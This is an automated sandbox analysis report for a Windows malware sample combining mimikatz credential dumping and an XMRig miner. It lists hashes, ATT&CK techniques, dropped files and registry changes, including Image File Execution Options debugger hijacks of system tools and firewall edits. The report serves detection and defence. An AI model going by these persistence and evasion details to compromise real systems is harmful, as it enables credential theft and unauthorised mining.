mimikatz | 1642bf175e9f011608fe9086da7e939f72e025e2f00d75af8b2b83f35edb47c0

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-01-2025 00:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe
Size

9.6MB
MD5

9d241c60a3e00cbbbababbae0c9db9fa
SHA1

eda89b9a731bb4837ebe06a3cead86ff2abd3596
SHA256

1642bf175e9f011608fe9086da7e939f72e025e2f00d75af8b2b83f35edb47c0
SHA512

33157bf2d8945da7115d1701dbd84165562957ec6b19ae0cbb34e93cfe9f9d72cfd55d1c762b2c40942636029f86aaf07ace5eeba5a082a3ab005431c3a98872
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4356 created 2148	4356	tmyfwky.exe	38

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (30107) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/2268-178-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-183-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-201-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-214-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-223-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-234-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-247-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-497-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-498-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-500-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-755-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig
behavioral2/memory/2268-756-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/1648-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/1648-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x000c000000023b76-6.dat	mimikatz
behavioral2/memory/5032-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/2652-138-0x00007FF6CB1C0000-0x00007FF6CB2AE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	tmyfwky.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	tmyfwky.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	tmyfwky.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2736	netsh.exe
2940	netsh.exe

Executes dropped EXE 27 IoCs

pid	Process
5032	tmyfwky.exe
4356	tmyfwky.exe
2580	wpcap.exe
4640	bzbnzbyct.exe
2652	vfshost.exe
4800	cmzbnyytn.exe
2016	xohudmc.exe
1172	gyggue.exe
2268	lfbpkn.exe
2580	cmzbnyytn.exe
4832	cmzbnyytn.exe
3960	cmzbnyytn.exe
3240	cmzbnyytn.exe
3784	cmzbnyytn.exe
2364	cmzbnyytn.exe
4736	cmzbnyytn.exe
2004	cmzbnyytn.exe
1384	cmzbnyytn.exe
5084	cmzbnyytn.exe
3836	cmzbnyytn.exe
2984	cmzbnyytn.exe
4548	cmzbnyytn.exe
4368	cmzbnyytn.exe
2024	cmzbnyytn.exe
1188	tmyfwky.exe
4604	midctcinn.exe
1576	tmyfwky.exe

Loads dropped DLL 12 IoCs

pid	Process
2580	wpcap.exe
2580	wpcap.exe
2580	wpcap.exe
2580	wpcap.exe
2580	wpcap.exe
2580	wpcap.exe
2580	wpcap.exe
2580	wpcap.exe
2580	wpcap.exe
4640	bzbnzbyct.exe
4640	bzbnzbyct.exe
4640	bzbnzbyct.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
64	ifconfig.me
63	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tmyfwky.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\gyggue.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	tmyfwky.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	tmyfwky.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	tmyfwky.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\gyggue.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tmyfwky.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tmyfwky.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	tmyfwky.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	tmyfwky.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	tmyfwky.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F	tmyfwky.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F	tmyfwky.exe

UPX packed file 35 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c63-134.dat	upx
behavioral2/memory/2652-135-0x00007FF6CB1C0000-0x00007FF6CB2AE000-memory.dmp	upx
behavioral2/memory/2652-138-0x00007FF6CB1C0000-0x00007FF6CB2AE000-memory.dmp	upx
behavioral2/files/0x0007000000023c6b-141.dat	upx
behavioral2/memory/4800-142-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/4800-146-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/files/0x0007000000023c6d-163.dat	upx
behavioral2/memory/2268-164-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/2580-172-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/4832-176-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/2268-178-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/3960-181-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/2268-183-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/3240-186-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/3784-190-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/2364-194-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/4736-199-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/2268-201-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/2004-204-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/1384-208-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/5084-212-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/2268-214-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/3836-217-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/2984-221-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/2268-223-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/4548-226-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/4368-230-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/2024-233-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp	upx
behavioral2/memory/2268-234-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/2268-247-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/2268-497-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/2268-498-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/2268-500-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/2268-755-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx
behavioral2/memory/2268-756-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\cnli-1.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\coli-0.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\ucl.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\svschost.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\vimpcsvc.xml	tmyfwky.exe
File created	C:\Windows\cbdnbivt\vimpcsvc.xml	tmyfwky.exe
File opened for modification	C:\Windows\cbdnbivt\vimpcsvc.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\unptrtjvi\ip.txt	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\ssleay32.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.exe	tmyfwky.exe
File created	C:\Windows\itcctjlje\Corporate\mimilib.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\tibe-2.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\spoolsrv.xml	tmyfwky.exe
File opened for modification	C:\Windows\itcctjlje\unptrtjvi\Result.txt	midctcinn.exe
File created	C:\Windows\cbdnbivt\spoolsrv.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\Corporate\mimidrv.sys	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.exe	tmyfwky.exe
File created	C:\Windows\cbdnbivt\schoedcl.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\trch-1.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\zlib1.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\svschost.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.xml	tmyfwky.exe
File created	C:\Windows\ime\tmyfwky.exe	tmyfwky.exe
File opened for modification	C:\Windows\itcctjlje\Corporate\log.txt	cmd.exe
File opened for modification	C:\Windows\cbdnbivt\tmyfwky.exe	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\schoedcl.exe	tmyfwky.exe
File opened for modification	C:\Windows\cbdnbivt\schoedcl.xml	tmyfwky.exe
File created	C:\Windows\cbdnbivt\tmyfwky.exe	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe
File created	C:\Windows\cbdnbivt\svschost.xml	tmyfwky.exe
File opened for modification	C:\Windows\cbdnbivt\spoolsrv.xml	tmyfwky.exe
File opened for modification	C:\Windows\itcctjlje\unptrtjvi\Packet.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\svschost.exe	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\Shellcode.ini	tmyfwky.exe
File created	C:\Windows\itcctjlje\unptrtjvi\Packet.dll	tmyfwky.exe
File opened for modification	C:\Windows\cbdnbivt\svschost.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\Corporate\vfshost.exe	tmyfwky.exe
File created	C:\Windows\itcctjlje\upbdrjv\swrpwe.exe	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\libxml2.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\vimpcsvc.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\schoedcl.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\crli-0.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\tucl-1.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\docmicfg.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\docmicfg.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\AppCapture64.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\exma-1.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\libeay32.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\xdvl-0.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.xml	tmyfwky.exe
File created	C:\Windows\cbdnbivt\docmicfg.xml	tmyfwky.exe
File opened for modification	C:\Windows\cbdnbivt\docmicfg.xml	tmyfwky.exe
File created	C:\Windows\itcctjlje\unptrtjvi\scan.bat	tmyfwky.exe
File created	C:\Windows\itcctjlje\unptrtjvi\midctcinn.exe	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\trfo-2.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\posh-0.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\specials\spoolsrv.exe	tmyfwky.exe
File created	C:\Windows\itcctjlje\UnattendGC\AppCapture32.dll	tmyfwky.exe
File created	C:\Windows\itcctjlje\unptrtjvi\wpcap.exe	tmyfwky.exe
File created	C:\Windows\itcctjlje\unptrtjvi\wpcap.dll	tmyfwky.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4644	sc.exe
1604	sc.exe
2196	sc.exe
2484	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
